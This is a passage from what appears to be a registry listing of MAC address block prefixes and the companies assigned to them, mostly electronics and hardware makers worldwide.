TECHNOLOGIES CO.,LTD. 7872641 Zhengzhou Reform Intelligent Device Co., Ltd 9880BBE D.Med Technical Products GmbH 9880BB1 GreatWall Information Co.,Ltd 7C8334A ENGINETECH (TIANJIN) COMPUTER CO.,LTD. 7C83348 Silicon Xpandas Electronics Co., Ltd. 986EE8E First Design System Inc. 986EE80 Sbarco Technology CO., Ltd. 986EE89 Span.IO, Inc. 1CAE3E7 NextDrive Co. 1CAE3E0 DAO QIN TECHNOLOGY CO.LTD. 1CAE3E4 P.H.U. Metering Anna Moder 986EE83 ReeR SpA 986EE8A Logos Payment Solutions A/S 986EE86 Blair Companies 7C8334C Hunan Datang Xianyi Technology Co.,Ltd 50DE19E DTEN Inc. 38A8CD9 PT Supertone 38A8CDA NIC Technologii 38A8CD5 Revo Infratech USA Ltd 785EE8E Suzhou Tianping Advanced Digital Technologies Co.Ltd 785EE82 Vega-Absolute 785EE88 Jiangxi guoxuan radio and television technology Co.,Ltd 7C8334B Shenzhen AZW Technology Co., Ltd. 785EE83 Incontrol LLC 2836132 Shenzhen HQVT TECHNOLOGY Co.,LTD 6433B55 Revo Smart Technologies co.,limited 2836136 ESI Ventures, LLC 283613D AVYCON 2836130 Shandong SIASUN Industrial Software Research Institute Co., Ltd 584849C Haag-Streit AG 44A92CD NPP KOMETEH JSC 44A92C9 China Electronics Corporation Greatwall Shengfeifan information system Co.,ltd. Hu'nan computer R.&D. Center 5848494 SERNET (SUZHOU) TECHNOLOGIES CORPORATION 584849D Telegaertner Elektronik GmbH 5848498 STACKFORCE GmbH 7813056 CRRC Nangjing Puzhen Haitai Brake Equipment Co., LTD A85B36E ORBITVU Sp. z o. o. A85B367 Louis Vuitton Malletier F02A2B6 Shenzhen ORVIBO Technology Co., Ltd. A85B360 Bluesoo Tech (HongKong) Co.,Limited A85B366 DAP B.V. 7813058 Shenzhen AV-Display Co.,Ltd 781305B Bithouse Oy E878291 Shenzhen Jointelli Technologies Co.,Ltd E87829A METZ CONNECT GmbH E87829E Solos Technology Limited 3049505 IK Elektronik GmbH 1874E2A Linux Automation GmbH E87829D Bernd Walter Computer Technology 1874E2D Samriddi Automations Pvt. Ltd. D09FD96 Elevoc Technology Co., Ltd. D09FD9A Eurolan Ltd E05A9F8 Fujian Newland Auto-ID Tech. Co,.Ltd. 1874E2C NextGen RF Design, Inc. 1874E21 Sartorius Lab Instruments GmbH & Co. KG C0FBF9D Dropbeats Technology Co., Ltd. C8F5D6C Eltako GmbH C8F5D6B United Barcode Systems 88C9B3E Sercomm Corporation. 88C9B38 Divelbiss Corporation 88C9B34 Hasbro Inc C0FBF9C SHENZHEN ELSKY TECHNOLOGY CO., LTD 88C9B3D Origins Technology Limited 88C9B35 Brabender Technologie GmbH & Co, KG 20CE2AE Funkwerk Systems GmbH 1CA0EF7 tec5AG 20CE2AA MeshPlusPlus, Inc. 20CE2AD LAUDA DR R WOBSER GMBH & CO KG 20CE2A5 Zaber Technologies Inc. 20CE2AB Swarovski Optik KG 20CE2A9 Rugged Monitoring 1CA0EF3 Sequent AG 6015925 Comfit HealthCare Devices Limited 601592D REMOWIRELESS COMMUNICATION INTERNATIONAL CO.,LIMITED 601592A insensiv GmbH 0C5CB51 avxav Electronic Trading LLC 0C5CB50 Yamasei 0C5CB52 HongKong Blossom Limited 0C5CB5E Munters Europe AB 6015922 EDA Technology Co.,LTD 0411198 Shenzhen YIZHENG Technology Co.,Ltd 041119E JULIDA LIMITED 0411190 FORT Robotics Inc. E86CC79 Hangzhou Lanxum Security Technology Co., Ltd E86CC76 KLAB 245DFCC Senix Corporation 245DFCD Hunan Honestone lntelligence Technology Co.,Ltd E86CC75 Shenzhen Rongda Computer Co.,Ltd 245DFCE Dodge 041119B Hubei Baobao Intelligent Technology Co.,LTD 78D4F1C TNB 446FD81 Shenzhen Furuilian Electronic Co.,Ltd. 446FD84 lb Lautsprecher gmbH 78D4F16 Guangzhou Kingray information technology Co.,Ltd. 78D4F13 Ekoenergetyka - Polska S.A. 446FD8B Beijing gpthink technology co.,LTD. 446FD88 Global Telecom Engineering, Inc A453EE5 Foshan Yisihang Electrical Technology Co., Ltd. A453EE3 Larva.io OÜ 885FE8E Unicom Global, Inc. A453EEA shanggong technology Ltd 78D4F10 Burisch Elektronik Bauteile GmbH A0024AE IoTecha Corp A453EE4 Williamson Corporation A453EEC SOS LAB Co., Ltd. 8CAE495 Gati Information Technolog(Kunshan)Co.,Ltd. 0055DAA Speechlab 8CAE492 SEVERIN Elektrogeräte GmbH 8CAE493 BERTIN TECHNOLOGIES 8411C21 Beijing Dayu Technology Co., Ltd. 8411C2B Guangdong Creator&Flyaudio Electronic Technology Co.,LTD 8411C29 C TECH BILISIM TEKNOLOJILERI SAN. VE TIC. A.S. 8411C23 FUJIFILM Healthcare Corporation 8411C2E Dangerous Music Group, LLC FCCD2FA SCOPUS INTERNATIONAL-BELGIUM 2085939 Mastodon Design 5895D8D Alunos AG 5895D8B SuZhou Ruishengwei Intelligent Technology Co.,Ltd 5895D87 Epiphan Systems Inc DC4A9E0 Dongguan Huili electroacoustic Industrial Co.,ltd 58208AB Infodev Electronic Designers Intl. 58208A5 JIA HUANG JHAN YE CO.,LTD 58208AD SAMBO HITECH CC4F5C0 Chengdu Ren Heng Mei Guang Technology Co.,Ltd. CC4F5C2 MatchX GmbH FCCD2FC Spedos ADS a.s. C863142 Tymphany Acoustic Technology (Huizhou) Co., Ltd. 98FC84B chiconypower 98FC848 Guangdong DE at science and technology co., LTD 18FDCB5 Accel Robotics 18FDCB2 Cabtronix AG 58208AA Conductix-Wampfler 28B77C9 Anser Coding Inc. 4C93A6D Cantronic Systems (Canada) Inc 4C93A61 Atrie Technology Fzc 28B77CE Ray Pte Ltd 4C93A6C Wuhan Maiwe communication Co.,Ltd F469D53 ITS Co., Ltd. F469D58 WiFi Nation Ltd F469D51 Junchuang (Xiamen) Automation Technology Co.,Ltd 5C857EA Zhejiang Jetron Ark Digital Technology Co., Ltd 5C857E7 Beijing HZFD Technology Co., Ltd 5C857E1 Sichuan C.H Control Technology Co., Ltd. 5C857E3 Cable Matters Inc. D014110 EkkoSense Ltd D014112 Evoco Labs CO., LTD D01411C Shen Zhen HaiHe Hi-Tech Co., Ltd 3049503 Morgan Schaffer Inc. 3049504 ADVANCED MICROWAVE ENGINEERING SRL 5C857ED Nautech Electronics Ltd 3049507 Shenzhen iTG robot Co.,Ltd. E41E0A1 Connected Cars A/S 8489ECD Price Industries Limited CCC261E Toong In Electronic Corp. CCC261A Shenzhen Uyesee Technology Co.,Ltd CCC2612 Tecnoideal Srl 38F7CD7 ARUNAS PTY LTD 38F7CDD Macherey-Nagel GmbH & Co. KG 706979B Liquid Instruments Pty Ltd 7069795 Ibyte 38F7CD0 Polska Fabryka Wodomierzy i Ciep?omierzy FILA 706979E BAS-IP LP 7069790 Full Solution Telecom 7069798 An Phat Information Technology Co., Ltd 94FBA7A ELKRON 94FBA72 Beijing Leja Tech co., Ltd. 94FBA7E Skyring Smart Technologies(Shenzhen) Co., Ltd. 94FBA71 Inaxsys Security Systems inc. C09BF4D The Professional Monitor Company Ltd C09BF41 Connected Space Management F490CB8 Beijing Penslink Co., Ltd. F490CB3 Ricker Lyman Robotic C09BF4A Inveo F490CBD Simavita (Aust) Pty Ltd 94CC04B Shandong free optical technology co., ltd. 94CC049 ENTEC Electric & Electronic Co., LTD. 94CC04E SynchronicIT BV 6462666 Pass & Seymour, Inc d/b/a Legrand 6462663 FaceHeart Inc. 646266A Sensoro Co., Ltd. 90E2FC2 ShenZhen Temwey Innovation Technology Co.,Ltd. 90E2FC8 bitsensing Inc. 90E2FCC Stanley Security 90E2FCD Beijing Lanxum Computer Technology CO.,LTD. B0B3539 HANMECIPS CO. 14AE85D iSolution Technologies Co.,Ltd. 90E2FC4 Dongguan Kangyong electronics technology Co. Ltd 3CFAD38 Energous Corporation B0B3535 Zenlayer 402C768 Suteng Innovation Technology Co., Ltd. 402C767 Zhejiang Guoli Security Technology Co., Ltd. 402C760 Lista AG 3CFAD35 Gulf Security Technology Co., Ltd 3CFAD3D AMobile Solutions (Xiamen) CO. , LTD. 50DE19D Penny & Giles Aerospace Ltd 50DE195 Bliq B.V. 50DE19B BRAINWARE TERAHERTA INFORMATION TECHNOLOGY CO.,LTD. 402C766 Guangzhou LANGO Electronics Technology Co., Ltd. 3CFAD30 Home Control AS A0224E3 ProPhotonix 402C769 Annapurna labs 200A0D8 bcheck NV A0224E7 Applied Information, Inc. 200A0D2 Netinovo Technologies(Shenzhen) Ltd 5062550 Ufanet SC 3C39E7B chipsguide technology Co.,LTD C4954D9 Shenzhen Xtooltech Co., Ltd 6431397 Dongguan Huili electroacoustic Industrial Co.,ltd C4954D2 Shen Zhen Euse Technology Co.,Ltd 5062559 Southern Ground Audio LLC 440377D OMNISENSE SYSTEMS PRIVATE LIMITED TAIWAN BRANCH 10DCB68 Sanofi (Beijing) Pharmaceutical Co., Ltd. 10DCB62 CAL-COMP INDUSTRIA E COMERCIO DE ELETRONICOS E INFORMATICA LTDA 10DCB66 Prolan Zrt. 54A4934 Shenzhen C & D Electronics Co., Ltd. 10DCB6E Shenzhen Sunwoda intelligent hardware Co.,Ltd 401175B Chongqing IQIYI Intelligence Technology Co., Ltd. 401175D NanJing HuaStart Network Technology Co.,Ltd. 401175C disguise Technologies Limited 54A4938 Chengdu EVECCA Technology Co.,Ltd. 54A4931 ShenZhen Smart&Aspiration Co.,LTD 54A493D ASSEM TECHNOLOGY CO.,LTD. 54A4935 AUSOUNDS INTELLIGENCE, LLC 04D16ED Elotec Fischer Elektronik GmbH 54A493E Nederman Holding AB 10DCB64 Annapurna labs 4C4BF90 Multitek Elektronik Sanayi ve Ticaret A.S. 4C4BF96 Shandong Linkotech Electronic Co., Ltd. 34049E1 Connected IO 2085938 AASSET SECURITY 4011753 Beijing Hexinruitong Electric Power Technology Co., Ltd. 4011757 Guangzhou RALID Information System Co.Ltd 2085932 Mid Continent Controls, Inc. 4C4BF92 Shenzhen HommPro Technology Co.,Ltd 4C4BF93 Power Active Co., Ltd 2085935 Wave-In Communication 2415109 Topgolf Sweden AB 2415107 SuZhou A-rack Information Technology Co.,Ltd 44D5F22 Shenzhen Hebang Electronic Co., Ltd 44D5F2B Valeo Interior Controls (Shenzhen) Co.,Ltd 44D5F25 tiga.eleven GmbH D05F64C Nanjing Huamai Technology Co.,Ltd 9806374 Chengdu Shuwei Communication Technology Co.,Ltd 980637A Angora Networks 2C16BD6 CLOUDWALK TECHNOLOGY CO.,LTD 2C16BDD Hangzhou Yanzhi Technology Co.,Ltd. B4A2EBE Dongguan Finslink Communication Technology Co.,Ltd. B4A2EB3 Canaan Creative Co.,Ltd. FCA47A2 Ant Financial(Hang Zhou)Network Technology Co.,Ltd. 2C16BDE Molex Incorporated 2C16BD5 Beijing Zhijian Link Technology Co., Ltd. D05F644 wallbe GmbH D05F640 Decathlon SA D05F64A PartnerNET LTD FCA47AE Hefei Feier Smart Science&Technology Co. Ltd FCA47A4 HOOC AG FCA47A5 Syfer B4A2EB1 DCI International, LLC. B4A2EB6 ShenZhen Lark Acoustics Co., Ltd. D0C857A shenzhen cnsun D0C8579 Shenzhen xiaosha Intelligence Technology Co. Ltd D0C8576 Innovative Industrial(HK)Co., Limited 300A601 Beijing Ruiteng Zhongtian TECH Ltd.,Co BC97402 Lattec I/S 8C593CC Dantherm Cooling Inc. D0C8574 Imin Technology Pte Ltd 745BC51 Beijing Inspiry Technology Co., Ltd. D0C8572 FORGAMERS INC. 1C8259C Evondos Oy 1C82595 Fagus-GreCon Greten GmbH & Co. KG 1C8259D Applied Concepts, Inc. 1C82590 Shandong Luneng Intelligence Technology CO., Ltd 1C82597 Jump Trading 1C82594 winsun AG F81D788 TELEOFIS BC9740D Rollock Oy BC97400 Alpha ESS Co., Ltd. 848BCDB CHONGQING HUAYI KANGDAO TECHNOLOGY CO.,LTD. 848BCD9 NORALSY 6095CE7 Cadmo Soluciones SAC 6095CED GovComm 6095CE1 Ponoor Experiments Inc. 6095CEA (UN)MANNED 6095CE9 Jlztlink Industry(ShenZhen)Co.,Ltd. 6095CE3 Robot S.A. 1C82593 C&A Marketing, INC. B0FD0B6 DNESO TEN Ltd. E41E0A4 XPR Group E41E0A9 B METERS S.R.L. B0FD0BB MartinLogan, Ltd. B0FD0BC Haltian Products Oy E41E0A6 SFC Energy AG 848BCD1 Shenzhen LTIME In-Vehicle Entertainment System Company Limited FCD2B66 Cirque Audio Technology Co.,Ltd FCD2B61 LINK (FAR-EAST) CORPORATION FCD2B64 SHEN ZHEN XIN HAO YUAN PRECISION TECHNOLOGY CO.,L TD E41E0AB Safety Vision, LLC E41E0A2 IDvaco Private Limited 34E1D1A OrCam Technologies C86314B Shenzhen Lihewei Electronics Co.,Ltd.Hunan Branch 34E1D18 Hubitat Inc. 34E1D1B APG Cash Drawer, LLC 745BC56 Yekani Manufacturing PTY Ltd 745BC57 SHENZHEN ATX TECHNOLOGY CO.,LTD 745BC55 SpringCard 745BC50 IRS Systementwicklung GmbH 745BC52 SIGLENT TECHNOLOGIES CO., LTD. 745BC5E Qingdao Wintec System Co., Ltd FCD2B67 Teamly Digital E44CC7B SmallHD E44CC71 ACS-Solutions GmbH E44CC7D Telo Systems Limitd E44CC79 Ottomate International Pvt. Ltd. D8860BE Shenzhen Yidong Technology Co.,Ltd D8860B8 VRINDA NANO TECHNOLOGIES PVT LTD 4CBC98D Elink Technology (Shenzhen) Co., Limited E05A9FC ShenZhen Mornsun Smartlinker Limited Co., LTD 4CBC980 Charge-Amps AB 38B19EC Gesellschaft industrieller Technologien CCD39D6 Krontech CCD39D9 Bejing Nexsec Inc. 38B19EE ShenZhen ShuaiXian Electronic Equipment Co.Ltd D8860B3 Auvidea GmbH 28F5378 1MORE D8860BC YUSAN INDUSTRIES LIMITED D8860BB Library Ideas D8860BD ComNav Technology Ltd. 38B19E0 Triple Jump Medical 38B19E5 Star Electronics GmbH & CoKG 38B19E2 HDANYWHERE 38B19EA Aeroespacial Guosheng Technology Co., Ltd 38B19E8 BoCo Inc. CCD39DB Q-Branch Labs, Inc. CCD39D4 Shenzhen Chenggu Technology Co., Ltd CCD39D8 Obelisk Inc. 9C69B4C Guangdong Hanwei intergration Co.,Ltd D425CC9 TAKUMI JAPAN LTD 9C69B4E NINGBO SHEN LINK COMMUNICATION TECHNOLOGY CO., LTD 9C69B40 Suzhou Fitcan Technology Co.,LTD 9C69B46 Shenzhen jiahua zhongli technology co.LTD 4C917A6 Openeye 4C917AC Alibaba (Beijing) Software Service Inc. 4C917A5 mtekvision 6CDFFBD Nanjing Buruike Electronics Technology Co., Ltd. 7CBC84E Beijing Topnew Group Co., Ltd 7CBC848 Shenzhen Kuang-chi Space Technology Co., Ltd. 6CDFFB4 Lineable Inc 7CBC843 Shanghai Yitu Technology Co. Ltd 7CBC84D VANTAGE INTEGRATED SECURITY SOLUTIONS PVT LTD 4C917A3 Smart Access 0CFE5D6 Antailiye Technology Co.,Ltd 0CFE5D4 Yantai Dongfang Wisdom Electic Co.,Ltd. 98F9C7E NC-LINK Technology Co., Ltd. 98F9C72 Pozyx NV 0CFE5D5 SELECTRIC Nachrichten-Systeme GmbH A83FA1E Guangzhou Navigateworx Technologies Co., Limited A83FA1A Shanghai East China Computer Co., Ltd 0CFE5D7 Vermes Microdispensing GmbH 6C5C3D9 IskraUralTEL 6C5C3D4 HTI Co., LTD. 3C6A2C3 figur8, Inc. 300A606 Realtime biometrics India pvt ltd A83FA1C Laonz Co.,Ltd A83FA17 Plejd AB A4ED436 Shanghai Facom Electronics Technology Co, ltd. A4ED435 Beijing ICPC CO.,Ltd. A028338 HZHY TECHNOLOGY A4ED43A Guangzhou Maxfaith Communication Technology Co.,LTD. A028333 SHANGHAI XUNTAI INFORMATION TECHNOLOGY CO.,LTD. A028331 Ordercube GmbH A02833A Medical Evolution Kft A4ED434 NETAS TELEKOMUNIKASYON A.S. 300A602 Advanced Electronic Designs, Inc. 8489EC2 thousand star tech LTD. 3009F9C Honeywell 9CF6DDE Shanxi ZhuoZhi fei High Electronic Technology Co. Ltd. 3009F9B Sichuan Nebula Networks Co.,LTD. B8D8122 IPM Sales and service Co.,Ltd. 9CF6DD2 Beijing Sifang Automation Co., Ltd. 9CF6DD5 b8ta Inc. 3009F9E ZhongLi HengFeng (Shenzhen) Technology co.,Ltd. 9CF6DD0 Annapurna labs C083590 CHONGQING JIUYU SMART TECHNOLOGY CO.LTD. 04C3E62 SiS Technology 04C3E67 Advanced Digital Technologies, s.r.o. 04C3E61 Guangdong New Pulse Electric Co., Ltd. 3C427EE Xiaoniu network technology (Shanghai) Co., Ltd. 04C3E66 Shenzhen Shuotian Information Technology Co., LTD D47C442 YunDing Network Technology (Beijing) Co., Ltd D47C449 Suzhou Wan Dian Zhang Network Technology Co., Ltd B44BD6A Shenzhen Huabai Intelligent Technology Co., Ltd. 3C427E7 GJS Co., Ltd. 3C427E9 TAITEX CORPORATION B44BD6C Impakt S.A. 3C427E1 Dongguan Taide Industrial Co.,Ltd. A019B23 Power Diagnostic Service Co., LTD. CCD31ED CUJO LLC A019B2C LDA Technologies 74F8DBA Ballard Technology, Inc, A019B20 Vast Production Services 2C48358 DPS Electronics 3C24F05 CASKY eTech Co., Ltd. 8C1CDAA China Potevio Co., Ltd 2C4835B Shanghai Visteon Automotive Electronics System CO. Ltd. 8C1CDA4 Anntec (Beijing) Technology Co.,Ltd. 480BB25 Solaredge LTD. 480BB23 shanghai Rinlink Intelligent Technology Co., Ltd. 0C73EB6 Green Fox Electro AS 3C24F0D Travis Holding B.V. 3C24F01 Abrites Ltd. 301F9A8 FINE TRIUMPH TECHNOLOGY CORP.,LTD. 301F9A5 Beijing Surestar Technology Co. Ltd, 301F9A0 ILSAN ELECTRONICS 301F9A1 Dewesoft d.o.o. A4DA22C EHO.LINK F041C83 SHENZHEN WISEWING INTERNET TECHNOLOGY CO.,LTD 88A9A74 Thomas & Darden, Inc 88A9A7A Zhejiang Haoteng Electronic Technology Co.,Ltd. F041C8B Powervault Ltd DCE533E Giant Power Technology Biomedical Corporation DCE533D Suzhou ATES electronic technology co.LTD DCE533C BRCK DCE5334 shenzhen bangying electronics co,.ltd C4FFBC3 SHENZHEN KALIF ELECTRONICS CO.,LTD 9C431EB JNL Technologies Inc 9C431EC SuZhou Jinruiyang Information Technology CO.,LTD C4FFBC4 iMageTech CO.,LTD. DCE5330 FLYHT Aerospace DCE5339 Tiertime Corporation 282C02C Epoch International Enterprises, Inc. F8B5681 PT. Eyro Digital Teknologi 282C024 EFENTO T P SZYDŁOWSKI K ZARĘBA SPÓŁKA JAWNA 3873EA2 Eyesight(Shanghai)Communication Technology Co.,Ltd. 3873EA0 L-3 Communications Mobile-Vision, Inc. 4048FD3 RL Controls LLC. 3873EA8 Rock Electronic Co., Ltd. 4048FD4 Dynamic Engineering 4048FDB Magenta Labs, Inc. 4048FD1 Fast Programming 4048FDE SMART SENSOR DEVICES AB EC9F0D5 Paw-Taw-John Services, Inc. 34D0B88 Vtrek Group International Ltd. 34D0B82 Blustream Pty Ltd 34D0B85 eesy-innovation GmbH 34D0B83 Tascent, Inc. EC9F0DC Sarcos Corp EC9F0D9 FCI EC9F0D0 Hesai Photonics Technology Co., Ltd EC9F0D7 Bei jing Lian Shan times Techonology Co.Ltd 741AE0A SAIERCOM CORPORATION 741AE06 Blocks Wearables Inc. 549A115 Elotech Industrieelektronik GmbH AC1DDF3 CRDE 741AE0D Voltaware Services Limited 904E919 CUTTER Systems spol. s r.o. 904E915 mcf88 SRL 904E917 IBM 904E912 North Pole Engineering, Inc. 904E916 Nuwa Robotics (HK) Limited Taiwan Branch 904E910 Spirtech CC2237C Hebei ZHSF Technology Co.,Ltd. CC22374 SHANGHAI CARGOA M.&E.EQUIPMENT CO.LTD 2C279E5 AudioNord Distribution A/S 50FF99E Informa LLC CC22373 XConnect Professional Services 189BA51 ChengDu Vantron Technology, Ltd. 34008AC Shenzhen Eternal Idea Tech Co.,Ltd 34298F2 Shenzhen Advance River System Technology Co., Ltd 34008A4 Fotonic i Norden AB 34008AD ChengDu HuiZhong Cloud Information Technology Co., Ltd. 34008A9 Keruyun Technoligies(Beijing) Corporation Limited 34008A2 RPE "Monitor" 28F5377 Shenzhen Modern Cowboy Technology Co.,Ltd. 28F5373 PRIMETECH ENGINEERING CORP. 28F537B LogiM GmbH Software und Entwicklung 28F5375 Atomrock LLC 28F537D Skyrockettoys LLC 28F5370 Valeo Siemens eAutomotive Norway 78D800A Insignal Co., Ltd. 28F5371 Umojo 7CBACC1 Changsha SUNYE Electric Co., Ltd. 7CBACC4 Sun Asia Trade Co. AC64DDD HMicro Inc 78D8004 CS Instruments GmbH A0C5F21 KNS Group LLC (YADRO Company) 4C65A83 Roost A0C5F2E Synapsys Solutions Ltd. F88A3C2 KLATU Networks Inc F88A3C3 Shenzhen Shengyuan Tech Ltd. 4C65A8A Suzhou Embedded Electronic Technology Co., Ltd. 04714B0 Neurio Technology Inc. F023B99 Emu Technology F023B95 Audeara Pty. Ltd. A0C5F22 Speedgoat GmbH A0C5F27 Viettronimex JSC 04714B9 Lighthouse AI, Inc 60D7E31 Elap s.r.l. 1CC0E17 SHENZHEN KINSTONE D&T DEVELOP CO.,LTD 08ED027 Eleven Engineering Incorporated 04714BB DIGIBEST TECHNOLOGY CO., LTD. 04714BC KittyHawk Corporation 08ED022 TES Touch Embedded Solutions Inc. 144FD74 Red Technology Limited 144FD73 Qingdao Wodatong Electronics Co., Ltd. 08ED028 HANTAS CO., LTD. 98AAFC2 Shenzhen UniStrong Science & Technology Co., Ltd 144FD7A Unirobot Corporation 98AAFCB Resonant Systems Inc. 98AAFCA SENKO Co.,Ltd. A411636 Beijing XiaoRui Technology Co., Ltd 1CA0D32 NovTech, Inc. 40F385C Clixxo Broadband Private Limited 40F3851 Johnson Matthey 8CC8F4B PTYPE Co., LTD. 8CC8F4D Beijing Xinxunxintong Eletronics Co.,Ltd 8CC8F45 Beijing KXWELL Technology CO., LTD 40F385B URMET Home & Building Solutions Pty Ltd 50A4D03 Guangzhou Hysoon Electronic Co., Ltd. 50A4D0C Beijing YangLian Networks Technology co., LTD A4580FB ABB AB PGHV A4580F3 Engineered SA A4580F7 Changsha Tai Hui Network Technology Co.,Ltd 40ED989 TeraTron GmbH 34049E4 Harbin Yantuo Science and Technology Development Co., Ltd 40ED98E BORDA TECHNOLOGY 500B916 Security Alarms & Co. S.A. 40ED98D Hangzhou GANX Technology Co.,Ltd. 244E7BB Mighty Audio, Inc. 7CCBE2D optilink networks pvt ltd 500B913 EWIN TECHNOLOGY LIMITED 7CCBE24 Ningbo bird sales co.,LTD 244E7B3 Shenzhen Ruixunyun Technology Co.,Ltd. 1CC0E16 Monument Labs, Inc. 1CC0E12 Abbott Medical Optics Inc. 100723C Shenzhen Xinfa Electronic Co.,ltd 244E7B1 sonoscape 244E7BC CHUNGHSIN TECHNOLOGY GROUP CO.,LTD 4865EEE CNU 4865EE5 Swistec Systems AG 4CE173D KTC(K-TEL) AC64DDC Beijing Hamigua Technology Co., Ltd. 4CE1730 Beijing Sutongwang E-Business Co., Ltd 383A213 Shanghai Greatwall Safety System Co.,Ltd 383A21C Mission Embedded GmbH F81D785 DACONS F81D782 Xperio Labs Limited F81D789 Ophrys Systèmes 70F8E73 Dr. Simon Consulting GmbH 70F8E7A TiVACI CORPORATION PTE LTD 84E0F4B Orchard Electronics Co., Ltd. 84E0F43 ASL Intercom B.V. 84E0F4C AIMTRON CORPORATION 84E0F40 ShenZhen Panrich Technology Limited C0D391E SAMSARA NETWORKS INC C0D391A Alpha Audiotronics, Inc. C0D391C Zhinengguo technology company limited 58E8769 TEM Mobile Limited 58E8764 PROBIT SRL C0D3915 WiTagg, Inc F0ACD7A Groupeer Technologies F0ACD7D Smart Power Technology Co., Ltd. 5CF2860 Hangzhou Signwei Electronics Technology Co., Ltd 2836381 Panasonic System Solutions Europe 2836389 Shenzhen Zhi Hua Creative Technology Co., Ltd. D0D94F2 Teco Image Systems Co., Ltd. D0D94F6 Hyundai Autohow D0D94F9 Hangzhou xiaoben technology co.,Ltd 8C192D5 ELCO(TIANJIN)ELECTRONICS CO.,LTD. CCD31E3 KEN A/S D0D94F1 mycable GmbH CCD31E0 SAMIM Co CCD31E1 Rondo Burgdorf AG CCD31E2 Neptune Systems D0D94FB MAX Smart Home, LLC C47C8DE Labor Strauss Sicherungsanlagenbau GmbH 6891D00 Central Railway Manufacturing 6891D02 Shenzhen NeaTech Intelligence Technology Co., Ltd. 6891D06 femrice C47C8D1 LYNX INNOVATION LITIMED C47C8D0 ATI E0B6F57 Shenzhen Xrinda Technology Ltd E0B6F50 BeSTAR Corporation 50FF999 Sea Eagle Optoelectronic Information Technology(Tianjin)co,Ltd 986D350 Shenzhen MALATA Mobile Communication Co.,LTD 50FF990 Simicon 50FF996 LEGEND WINNER LIMITED 7C477CD Speedifi Inc 986D353 DH Mechatronic AG 7C477CA Dspread Technology (Beijing) Inc. 7C477C7 BlueSmart Technology Corporation 5CF2864 CHIPSEN Co.,Ltd. 5CF2861 iSon Tech 38FDFE6 Inspero Inc 38FDFED FUBA Automotive Electronics GmbH 38B8EB1 1.A Connect GmbH 78CA83E Konecranes 38B8EB3 Aina Wireless Inc 78CA835 Huatune Technology (Shanghai) Co., Ltd. 1C88797 Sensys Networks, Inc. 1C87746 Schawbel Technologies LLC 1C8774B HABEY USA Inc. 1C88795 SHENZHENFREELINK ELECTRONIC CO.,LTD 1C8776A Jiangsu ETERN COMMUNICATION Co.,ltd 1C88793 Shenzhen Xiaoxi Technology Co., Ltd. 1C8776C Strone Technology 1C87794 Novetta 1C87765 Zhuhai MYZR Technology Co.,Ltd 1C88799 Xingtera China Ltd 8439BE4 Shenzhen Ramos Digital Technology Co,.Ltd. 40A36B5 National Research Council of Canada 8439BE5 Neat S.r.l. 70886B2 CVnet 40A36BA Embrionix Design Inc. 70886B5 Chengdu Ophylink Communication Technology Ltd. CC1BE0C Guangzhou Southelectric Power Science Technology Development Co.,Ltd. A03E6BD Jining SmartCity Infotech Co.Ltd. 0055DA1 KoolPOS Inc. C88ED1B Advanced Micro Controls Inc. C88ED18 Electronic Controls Design, Inc. C88ED19 Focalcrest, Ltd. 0055DA5 Nanoleaf 0055DA4 Datapath Limited 0055DA8 BroadSoft, Inc. A03E6BA Shenzhen Neostra Technology Co.Ltd CC1BE04 Laserworld (Switzerland) AG B0C5CA6 SunTech Medical, Inc. DC44272 Skywave Technology Co,.Ltd. B0C5CA4 shanghai University Ding-Tech software Corp.,ltd DC44276 EK-TEAM Elektronik- u. Kunststoff-Technik GmbH DC44277 EcoGuard AB 78C2C02 RONIX incorporated 78C2C03 Ningbo Sanxing Electric Co., Ltd. B437D1C NANJING PUTIAN TELECOMMUNICATIONS TECHNOLOGY CO.,LTD. B437D19 Nanjing yuekong Intelligent Technology B437D18 eInfochips Limited B437D15 Stratom, Inc. B437D14 KOMSIS ELEKTRONIK SISTEMLERI SAN. TIC. LTD.STI 74F8DBC TBM CO., LTD. 74F8DBE Bernard Krone Holding GmbH & Co. KG 74F8DBB Capwave Technologies Inc 74F8DB9 Avantree Corporation 78C2C0C Shanghai Hanyi Technologies Co,.Ltd. 807B853 Zhuhai TOP Intelligence Electric Co., Ltd. 807B851 Hangzhou Synway Information Engineering Co., Ltd 74F8DB0 Enercon Technologies 549A118 Tite, Inc. 549A119 Alfen BV 807B854 Quantel USA, Inc. 807B855 EFCO 549A11B Elite Silicon Technology, Inc. 885D908 Creative Sensor Inc. 549A112 Torrap Design Limited 885D90E Unitac Technology Limited 885D90A Shenzhen Speedrun Technologies Co.,Ltd. 885D902 DAIDONG Industrial System Co., Ltd. 80E4DA1 Guangzhou Pinzhong Electronic Technology CO., LTD 80E4DA2 Thurlby Thandar Instruments LTD 1CCAE3A SIREA 2CD141C PIN SHANG LED Co., LTD. 1CCAE35 TengFeng 64FB817 Securosys SA 9802D89 Navroom Beijing, China 9802D8A HySecurity 9802D87 Ormazabal Protection&Automation A0BB3EB Beijing Techshino Technology Co., Ltd. 9802D80 Stoerk-Tronic, Stoerk GmbH & Co.KG A0BB3E7 SIMTEC Elektronik GmbH 9802D8D Promicon Elektronik GmbH + Co.KG 9802D8B HANSHIN MEDICAL CO., LTD. 90C682D PowerShield Limited 90C6824 Neone, Inc. 2C6A6F4 TINYCO 2C6A6F6 Beep, Inc. 2C6A6F3 Cloudproject Generation Srl 2CD1414 Shanghai RW ELE&TEC CO.,LTD 2C6A6FD Holjeron 2C6A6FC Sensity Systems 2C265F8 Itus Networks, LLC 2C265F7 Coremate Technical Co., Ltd 2C265F4 GTA Electronics Co., Ltd. F80278D Dueton Systems s.r.o. F80278A Luxul Technology Inc 2C265F1 Griessbach 28FD800 Millcode 28FD807 University of York 28FD801 Galileo, Inc. 28FD80D Grandway Technology (Shenzhen) Limited A0BB3E0 Link Labs A44F294 DGC Access AB A44F296 Selektro Power Inc A44F295 Shanghai KuanYu Industrial Network Equipment Co.,Ltd 3C39E73 ELSA Japan Inc. A44F292 LUCEOR A44F291 Olssen B.V. 0CEFAF9 Rotel 0CEFAF6 Firmware Design AS F802781 Reason Tecnologia SA 0CEFAF3 Engineering Center ENERGOSERVICE 1007231 Beijing Assem Technology Co., ltd D02212A GNS-GmbH E818633 DongGuan Pengxun Electronics Technology Co., Ltd. E818634 Guangzhou Tianyi Electronics Co., Ltd B8D812E ZheJiang FangTai Electirc Co., Ltd E818630 DigiMagus Technology (Shenzhen) Co., Ltd E81863A JDM Mobile Internet Solution(Shanghai) Co., Ltd. E818636 ARTECH SOLUTION CO.,LTD B8D8129 Entotem LTD D02212C Xperio Labs Ltd. 